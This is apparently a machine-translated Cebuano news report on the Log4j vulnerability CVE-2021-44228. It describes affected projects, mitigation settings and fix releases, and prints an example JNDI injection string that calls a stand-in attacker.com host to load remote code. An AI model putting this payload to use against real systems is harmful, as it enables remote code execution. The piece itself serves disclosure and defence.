Sa Apache Log4j, usa ka sikat nga balangkas alang sa pag-organisar sa pag-log sa mga aplikasyon sa Java, usa ka kritikal nga kahuyangan ang nahibal-an nga nagtugot sa arbitraryong code nga ipatuman kung ang usa ka espesyal nga giporma nga kantidad sa "{jndi:URL}" nga pormat gisulat sa log. Ang pag-atake mahimong ipatuman sa mga aplikasyon sa Java nga nag-log sa mga kantidad nga nadawat gikan sa gawas nga mga gigikanan, pananglitan, kung gipakita ang mga problema nga kantidad sa mga mensahe sa sayup.
Namatikdan nga hapit tanan nga mga proyekto nga naggamit mga balangkas sama sa Apache Struts, Apache Solr, Apache Druid o Apache Flink apektado sa problema, lakip ang Steam, Apple iCloud, mga kliyente ug server sa Minecraft. Gilauman nga ang pagkahuyang mahimong mosangput sa usa ka balud sa daghang mga pag-atake sa mga aplikasyon sa korporasyon, nga gisubli ang kasaysayan sa mga kritikal nga kahuyangan sa balangkas sa Apache Struts, nga, sumala sa usa ka kasarangan nga pagbanabana, gigamit sa mga aplikasyon sa web sa 65% ββsa Fortune 100 ka mga kompanya Naglakip sa pagsulay sa pag-scan sa network alang sa mga huyang nga sistema.
Ang problema gipasamot sa kamatuoran nga ang usa ka nagtrabaho nga pagpahimulos na-publish na, apan ang mga pag-ayo alang sa mga lig-on nga mga sanga wala pa ma-compile. Ang CVE identifier wala pa ma-assign. Ang pag-ayo gilakip lamang sa log4j-2.15.0-rc1 test branch. Isip usa ka solusyon sa pagbabag sa kahuyang, girekomendar nga itakda ang log4j2.formatMsgNoLookups parameter sa tinuod.
Ang problema tungod sa kamatuoran nga ang log4j nagsuporta sa pagproseso sa mga espesyal nga maskara "{}" sa mga linya nga output sa log, diin ang JNDI (Java Naming ug Directory Interface) nga mga pangutana mahimong ipatuman. Ang pag-atake nagsugod sa pagpasa sa usa ka string nga adunay pagpuli nga "${jndi:ldap://attacker.com/a}", sa pagproseso diin ang log4j magpadala usa ka hangyo sa LDAP alang sa agianan sa klase sa Java sa server sa attacker.com. . Ang agianan nga gibalik sa server sa tig-atake (pananglitan, http://second-stage.attacker.com/Exploit.class) i-load ug ipatuman sa konteksto sa kasamtangang proseso, nga nagtugot sa tig-atake sa pagpatuman sa arbitraryong code sa sistema nga adunay mga katungod sa kasamtangan nga aplikasyon.
Addendum 1: Ang pagkahuyang gihatag ang identifier CVE-2021-44228.
Addendum 2: Usa ka paagi sa paglaktaw sa proteksyon nga gidugang pinaagi sa pagpagawas log4j-2.15.0-rc1 giila. Usa ka bag-ong update, log4j-2.15.0-rc2, gisugyot nga adunay mas kompleto nga proteksyon batok sa kahuyang. Gipasiugda sa code ang pagbag-o nga nalangkit sa pagkawala sa abnormal nga pagtapos sa kaso sa paggamit sa usa ka sayop nga pagka-format nga JNDI URL.
Source: opennet.ru